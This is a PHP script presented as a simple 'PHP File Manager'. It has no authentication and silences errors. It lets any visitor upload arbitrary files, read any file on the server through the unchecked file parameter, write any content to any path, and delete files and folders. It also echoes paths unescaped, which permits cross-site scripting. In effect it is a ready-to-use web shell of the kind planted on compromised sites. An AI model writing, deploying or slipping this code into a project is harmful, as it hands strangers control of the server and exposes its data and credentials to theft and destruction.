<?php
error_reporting(0);
set_time_limit(0);

// Get current directory (sanitize path)
$cwd = isset($_GET['dir']) ? realpath($_GET['dir']) : getcwd();
if (!$cwd || strpos($cwd, realpath($_SERVER['DOCUMENT_ROOT'])) !== 0) {
    $cwd = getcwd(); // Prevent access outside the root
}

// Function to delete entire directory
function deleteDir($dir) {
    if (!is_dir($dir)) return;
    $files = array_diff(scandir($dir), array('.', '..'));
    foreach ($files as $file) {
        $path = "$dir/$file";
        is_dir($path) ? deleteDir($path) : unlink($path);
    }
    rmdir($dir);
}

// Handle directory deletion
if (isset($_GET['delete_dir'])) {
    $dir_to_delete = realpath($_GET['delete_dir']);
    if ($dir_to_delete && strpos($dir_to_delete, realpath($_SERVER['DOCUMENT_ROOT'])) === 0) {
        deleteDir($dir_to_delete);
        echo "<p>✅ Directory deleted: $dir_to_delete</p>";
    } else {
        echo "<p>❌ Cannot delete protected directory: $dir_to_delete</p>";
    }
}

// Handle file upload
if (isset($_POST['upload'])) {
    $uploadfile = $cwd . "/" . $_FILES['file']['name'];
    if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
        echo "<p>✅ File uploaded successfully!</p>";
    } else {
        echo "<p>❌ Upload failed!</p>";
    }
}

// Handle file save
if (isset($_POST['save']) && isset($_POST['filepath']) && isset($_POST['content'])) {
    file_put_contents($_POST['filepath'], $_POST['content']);
    echo "<p>✅ File saved successfully!</p>";
}

// Handle file deletion
if (isset($_GET['delete_file'])) {
    $file_to_delete = realpath($_GET['delete_file']);
    if ($file_to_delete && strpos($file_to_delete, realpath($_SERVER['DOCUMENT_ROOT'])) === 0) {
        unlink($file_to_delete);
        echo "<p>✅ File deleted: $file_to_delete</p>";
    } else {
        echo "<p>❌ Cannot delete protected file: $file_to_delete</p>";
    }
}

// HTML Output
echo "<html><head><title>PHP File Manager</title></head><body>";
echo "<h2>PHP File Manager</h2>";
echo "<p>Current Directory: $cwd</p>";

// File Upload Form
echo "<form method='post' enctype='multipart/form-data'>
    <input type='file' name='file'>
    <input type='submit' name='upload' value='Upload'>
</form>";

// Navigation: Show parent directory link
$parent = dirname($cwd);
if ($parent !== $cwd) {
    echo "<p><a href='?dir=$parent'>⬆ Go Up</a></p>";
}

// List Files & Directories
echo "<ul>";
foreach (scandir($cwd) as $file) {
    if ($file === "." || $file === "..") continue;
    $path = realpath("$cwd/$file");
    
    if (is_dir($path)) {
        echo "<li>[DIR] <a href='?dir=$path'>$file</a> 
        | <a href='?dir=$cwd&delete_dir=$path' onclick='return confirm(\"Are you sure you want to delete this folder and all its contents?\")'>Delete</a></li>";
    } else {
        echo "<li>[FILE] <a href='?dir=$cwd&file=$path'>$file</a> 
        | <a href='?dir=$cwd&delete_file=$path' onclick='return confirm(\"Delete this file?\")'>Delete</a></li>";
    }
}
echo "</ul>";

// File Editing Form
if (isset($_GET['file'])) {
    $filepath = $_GET['file'];
    if (file_exists($filepath)) {
        echo "<form method='post'>
            <textarea name='content' rows='10' cols='80'>" . htmlspecialchars(file_get_contents($filepath)) . "</textarea>
            <br>
            <input type='hidden' name='filepath' value='$filepath'>
            <input type='submit' name='save' value='Save'>
        </form>";
    }
}

echo "</body></html>";
?>
